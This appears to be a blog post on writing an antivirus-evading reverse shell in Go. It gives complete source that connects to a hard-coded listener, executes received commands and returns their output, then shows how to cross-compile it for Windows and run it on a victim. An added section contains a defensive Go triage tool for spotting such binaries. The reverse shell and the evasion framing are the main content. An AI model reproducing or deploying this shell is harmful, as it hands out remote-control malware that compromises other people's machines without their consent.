Undetectable Reverse shell with golang
I was exploring different methods to evade AV engines, which will be helpful during pen-testing engagements. Since most malware is written in C#, C++ and Python (because it supports cross-platform), and most of the PowerShell and DDE injection methods were detected by AV solutions, I thought of giving Go a try, because Go has many features such as concurrency, and it is also compiled to machine code, so it has good performance.
Getting Started
All we need is a small program that connects to a network port, reads a line of input from the socket, executes it as a command, and redirects the command's stdout and stderr back to the same network socket.
package main

import (
	"bufio"
	"fmt"
	"net"
	"os/exec"
	"strings"
)

func main() {
	// Connect back to the listener (address and port are hard-coded here).
	conn, _ := net.Dial("tcp", "10.1.75.200:8081")
	for {
		// Read one newline-terminated command from the socket.
		message, _ := bufio.NewReader(conn).ReadString('\n')
		// Run it and collect its standard output.
		out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()
		if err != nil {
			fmt.Fprintf(conn, "%s\n", err)
		}
		// Send the output back over the same connection.
		fmt.Fprintf(conn, "%s\n", out)
	}
}
Source:
https://github.com/sathish09/rev2go
We can build the Go source for any target OS and architecture by setting GOOS and GOARCH when building.
env GOOS=windows GOARCH=386 go build hello.go
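From the defender's side, the program above and the cross-compilation step leave a useful trace: every Go executable carries an embedded build-info blob, and a binary built with GOOS/GOARCH set records that target platform, the toolchain version and the main module path inside it. The following triage helper is an added example written for this page; it is not code from the original post or from the rev2go repository. It reads a sample (ELF, PE or Mach-O), scans it for byte markers typical of Go binaries and, where possible, parses the build info with the standard library package debug/buildinfo (Go 1.18 or newer). The marker list, the Report type and the names FindGoMarkers and Triage are my own choices for this example, and the markers are heuristics: which ones appear depends on the file format and on whether the binary was stripped.

```go
package main

import (
	"bytes"
	"debug/buildinfo"
	"fmt"
	"os"
)

// goMarker is a byte pattern whose presence suggests a Go-built executable.
// The list is a heuristic chosen for this example (assumption), not an
// exhaustive signature set.
type goMarker struct {
	name    string
	pattern []byte
}

var goMarkers = []goMarker{
	// Magic header of the embedded build-info blob that debug/buildinfo parses;
	// present in Go 1.13+ binaries and not removed by -ldflags="-s -w".
	{"buildinfo magic", []byte("\xff Go buildinf:")},
	// ELF section name holding the runtime's PC/line table.
	{"pclntab section", []byte(".gopclntab")},
	// Build ID string as typically stored in non-ELF formats such as PE.
	{"build id string", []byte("Go build ID:")},
}

// Report summarises what triage learned about one file.
type Report struct {
	Path      string
	Markers   []string // names of goMarkers found in the file bytes
	IsGo      bool
	GoVersion string // toolchain version from embedded build info, if readable
	MainPath  string // main module path from embedded build info, if readable
	GOOS      string // target OS recorded at build time, if present
	GOARCH    string // target architecture recorded at build time, if present
}

// FindGoMarkers returns the names of the markers present in data, in list order.
func FindGoMarkers(data []byte) []string {
	var found []string
	for _, m := range goMarkers {
		if bytes.Contains(data, m.pattern) {
			found = append(found, m.name)
		}
	}
	return found
}

// Triage reads a file, checks it for Go markers and, when the embedded build
// info can be parsed, records the toolchain version and target platform.
// debug/buildinfo understands ELF, PE and Mach-O, so a Windows sample that was
// cross-compiled on Linux can be inspected on the analyst's own machine.
func Triage(path string) (Report, error) {
	r := Report{Path: path}
	data, err := os.ReadFile(path)
	if err != nil {
		return r, err
	}
	r.Markers = FindGoMarkers(data)
	r.IsGo = len(r.Markers) > 0

	info, err := buildinfo.ReadFile(path)
	if err != nil {
		// The marker scan alone is still a useful result.
		return r, nil
	}
	r.GoVersion = info.GoVersion
	r.MainPath = info.Path
	for _, s := range info.Settings {
		switch s.Key {
		case "GOOS":
			r.GOOS = s.Value
		case "GOARCH":
			r.GOARCH = s.Value
		}
	}
	return r, nil
}

func main() {
	for _, path := range os.Args[1:] {
		r, err := Triage(path)
		if err != nil {
			fmt.Fprintf(os.Stderr, "%s: %v\n", path, err)
			continue
		}
		fmt.Printf("%s: go=%v markers=%v version=%q main=%q target=%s/%s\n",
			r.Path, r.IsGo, r.Markers, r.GoVersion, r.MainPath, r.GOOS, r.GOARCH)
	}
}
```

Run it as `go run triage.go <sample> [<sample> ...]`. Pointed at the executable produced by the build command above, it reports the Go version, the `windows/386` target, and the main module path, which is enough to pivot on in a hunt (for example, unsigned Go binaries from unknown module paths that open outbound connections) even when a signature-based AV scan is silent.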
Start the listener on the attacker box, transfer the file to the victim machine and run it. We get a reverse connection as soon as the victim runs the executable.
AV Scan Results:
So what's next?
Implement encryption and memory protection. Make it more interactive. Build a post-exploitation framework, and what not. Go is awesome 😉